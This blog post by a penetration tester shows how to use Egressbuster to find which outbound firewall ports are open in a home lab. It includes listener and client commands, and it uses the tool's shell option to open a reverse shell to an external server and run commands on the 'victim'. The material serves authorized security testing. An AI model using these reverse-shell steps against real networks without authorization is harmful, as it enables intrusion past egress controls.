Using Egressbuster to Test Outbound Firewall Rules

While I’ve used it for a while now, I wanted to share a quick write-up about Egressbuster.

Egressbuster – Introduction

Egressbuster (GitHub repository) is a tool by TrustedSec that they designed to test outgoing ports during a penetration test.

Configuring the Firewall

First, I configured my firewall to block all outgoing ports except for 22, 80, 443, and 31337-31339. This would allow me to verify that the application was working.

Egressbuster - Firewall rules

Additionally, it mirrors a real environment that might only allow HTTP(s) traffic and then something obscure outbound.

Starting the Server

With my firewall rules in place, I started the server up on a DO droplet.

root@ubuntu-512mb-sfo2-01:~# ifconfig eth0 | grep Mask
          inet addr:138.xx.xx.xx  Bcast:138.xx.xx.255  Mask:255.255.xx.xx

root@ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.

Running the Client

With the server running, it was time to test the rules.

While I used the egressbuster.py script, the results will be the same with the executable as well.

Also, based on my “very official” timing method, it takes about 12 minutes to test every port over my connection.

C:\Users\Ray\Documents>time
The current time is: 15:57:43.78
Enter the new time:
C:\Users\Ray\Documents>python egressbuster.py 138.xx.xx.xx 1-65535
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 65535/tcp
[*] Connection made to 138.xx.xx.xx on port: 22/tcp
[*] Connection made to 138.xx.xx.xx on port: 80/tcp
[*] Connection made to 138.xx.xx.xx on port: 443/tcp
[v] Trying: TCP 1000
[v] Trying: TCP 2000

... <snip> ...

[v] Trying: TCP 31000
[*] Connection made to 138.xx.xx.xx on port: 31337/tcp
[*] Connection made to 138.xx.xx.xx on port: 31338/tcp
[*] Connection made to 138.xx.xx.xx on port: 31339/tcp
[v] Trying: TCP 32000
[v] Trying: TCP 33000

... <snip> ...

[v] Trying: TCP 65000
[*] All packets have been sent
[i] Remaining threads: 301
[i] Remaining threads: 102
[i] Remaining threads: 3

... <snip> ...

[i] Remaining threads: 3
Traceback (most recent call last):
  File "egressbuster.py", line 168, in 
    time.sleep(2)
KeyboardInterrupt

C:\Users\Ray\Documents>time
The current time is: 16:09:49.56
Enter the new time:

I’m not sure why three threads didn’t want to complete, but the results were still completely accurate.

Server Results

Going back to the server, I was able to see the successful connections as well.

root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
[*] Connected from 172.xx.xx.xx on port: 80/tcp
[*] Connected from 172.xx.xx.xx on port: 443/tcp
[*] Connected from 172.xx.xx.xx on port: 31338/tcp
[*] Connected from 172.xx.xx.xx on port: 31337/tcp
[*] Connected from 172.xx.xx.xx on port: 31339/tcp
^C
[*] Exiting and removing iptables redirect rule.
[*] Done

Shell Parameter

Finally, I want to give a quick demonstration of the shell parameter. This parameter creates a reverse shell that allows you to send commands to the “target” system. Author’s note: This reverse shell goes from your listening server to the internal server, so you will need to either have an external IP address or NAT configured.

First, I setup NAT rules on my pfSense box so that I could receive the commands.

Egressbuster - NAT Everything

Next, I started the server back up with the shell parameter.

root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.

Finally, I ran the script to test outgoing connections again. Note that I only used ports 1-50 for this test since I already knew what would work.

C:\Users\Ray\Documents>python egressbuster.py 138.xx.xx.xx 1-50 shell
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 50/tcp
[*] Connection made to 138.xx.xx.xx on port: 22/tcp
[*] All packets have been sent
[i] Remaining threads: 50
[i] Remaining threads: 50
[i] Remaining threads: 1
[i] Remaining threads: 1
[*] Done

On the listener side, I was able to send commands to the client. This was occasionally flaky, and would drop or send the wrong command. I would probably use this for short bursts/1 or 2 commands before migrating to something more stable.

root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
Enter the command to send to the victim:
Enter the command to send to the victim: whoami
megatron\ray
Enter the command to send to the victim: ipconfig
Windows IP Configuration


Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : xxx
   IPv4 Address. . . . . . . . . . . : 192.168.5.xx
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.5.1

Tunnel adapter isatap.
Enter the command to send to the victim: dir
----------------------------------------
Exception happened during processing of request from ('172.xx.xx.xx', 59070)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "egress_listener.py", line 63, in handle
    self.request.sendall(request)
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
error: [Errno 32] Broken pipe
----------------------------------------

dir
^C
[*] Exiting and removing iptables redirect rule.
[*] Done

Egressbuster – Conclusion

This is a great tool for testing outgoing ports on a network, and I find myself using it from time to time.

Additionally, having the executable makes life easier for Windows machines without Python.

Note that a few vendors that flag the executable, so be aware of that during your testing.

Egressbuster - VirusTotal

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCP, eCPPT, eWPT, eWPTX, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next (currently GXPN) or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*